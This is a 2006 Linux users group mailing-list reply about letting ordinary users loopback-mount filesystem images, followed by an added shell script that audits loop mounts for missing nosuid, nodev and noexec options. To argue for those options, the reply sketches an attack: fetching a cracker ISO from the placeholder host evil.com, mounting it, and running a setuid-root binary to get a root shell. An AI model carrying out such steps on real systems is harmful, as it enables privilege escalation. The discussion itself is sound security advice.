Re: [PLUG] loopback mounting fs images
|
In the message dated: Thu, 16 Nov 2006 17:24:07 EST,
The pithy ruminations from Jeff Abrahamson on
<[PLUG] loopback mounting fs images> were:
=>
=>
=> Mount in general denies its services to non-privileged users unless
=> explicit authorization is made in /etc/fstab.
=>
=> I'd like to be able to mount filesystem images from an already mounted
=> filesystem without having to authorize myself specially. I don't
By "filesystem images from an already mounted filesystem" do you mean that an
image already exists as a file on the machine?
=> think this is possible, but I'm curious (1) if I'm wrong and it is
=> possible, and (2) what the security concerns of this would be as long
=> as mount restricted me to mounting files I own on mount-points I own
=> and didn't permit files in the newly mounted fs to have permissions or
=> ownership that I couldn't otherwise give them.
I don't understand the last part "as long as mount...didn't permit files in the
newly mounted fs to have permissions or ownership that I couldn't otherwise
give them". AFAIK, mount(8) doesn't have that kind of control. You can get some
of what you want with the "nosuid" option, but I don't believe that mount will
change the ownership of files to match the person doing the mounting.
Of course, mount has a gazillion options, depending on the specific filesystem
type that you are mounting, and how well those filesystem semantics translate
to your OS.
You may want to consider FUSE (http://fuse.sourceforge.net/) and the Mountlo
project. [DISCLAIMER]I haven't actually used FUSE.[/DISCLAIMER]
Otherwise, it's all too easy to do:
joeuser% cd /tmp
joeuser% wget -nd http://evil.com/downloads/crackertools.iso
joeuser% mkdir /tmp/mymountpoint
joeuser% mount /tmp/crackertools.iso /tmp/mymountpoint -t iso9660 -o loop=/dev/loop3,blocksize=1024
joeuser% ls -l /tmp/mymountpoint
-rws--x--x 1 root bin 106924 Jan 9 2004 getrootshell
joeuser% /tmp/mymountpoint/getrootshell
joeuser#
[the exercise of gaining root when you own device files is a bit more tricky,
but quite possible].
Seriously, if you're going to permit users to mount file systems,
enforce the "noexec" and "nosuid" and "nodev" options.
Mark
=>
=> Jeff
=>
=> Jeff Abrahamson <http://jeff.purple.com/> +1 215/837-2287
=> GPG fingerprint: 1A1A BA95 D082 A558 A276 63C6 16BF 8C4C 0D1D AE4B
=>
___________________________________________________________________________
Philadelphia Linux Users Group -- http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug
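As an added check from the administrator's side (example code written for this page, not code from the thread), a POSIX sh function that reads /proc/mounts-style lines and reports loop-device mounts that are missing the "nosuid", "nodev" and "noexec" options Mark recommends above. The mount table it runs against is constructed; on a real host you would feed it /proc/mounts instead.

```shell
#!/bin/sh
# Added example, not from the thread: audit mount-table lines for loop-backed
# filesystems lacking nosuid/nodev/noexec.
# Input format assumed: /proc/mounts style lines
#   <device> <mountpoint> <fstype> <options> <dump> <pass>

# Constructed sample mount table (not captured from a real system):
# one loop mount mounted with defaults, one mounted with the safe options.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime 0 0
/dev/loop3 /tmp/mymountpoint iso9660 ro,relatime 0 0
/dev/loop4 /home/joeuser/img ext2 rw,nosuid,nodev,noexec 0 0
tmpfs /run tmpfs rw,nosuid,nodev 0 0'

# Reads mount-table lines from stdin and prints one line per loop mount
# that lacks any of the three options: "<mountpoint> missing: <opts>".
audit_loop_mounts() {
    while read -r dev mnt fstype opts _rest; do
        case "$dev" in
            /dev/loop*) ;;          # only loop-backed image mounts
            *) continue ;;
        esac
        missing=""
        for want in nosuid nodev noexec; do
            case ",$opts," in
                *",$want,"*) ;;     # option present, nothing to report
                *) missing="$missing $want" ;;
            esac
        done
        if [ -n "$missing" ]; then
            printf '%s missing:%s\n' "$mnt" "$missing"
        fi
    done
}

# Runs the audit over the constructed sample; on a live system use
#   audit_loop_mounts < /proc/mounts
audit_sample() {
    printf '%s\n' "$SAMPLE_MOUNTS" | audit_loop_mounts
}

audit_sample
```

Only the iso9660 mount on /tmp/mymountpoint is reported; the ext2 image mounted with all three options and the non-loop filesystems are left alone.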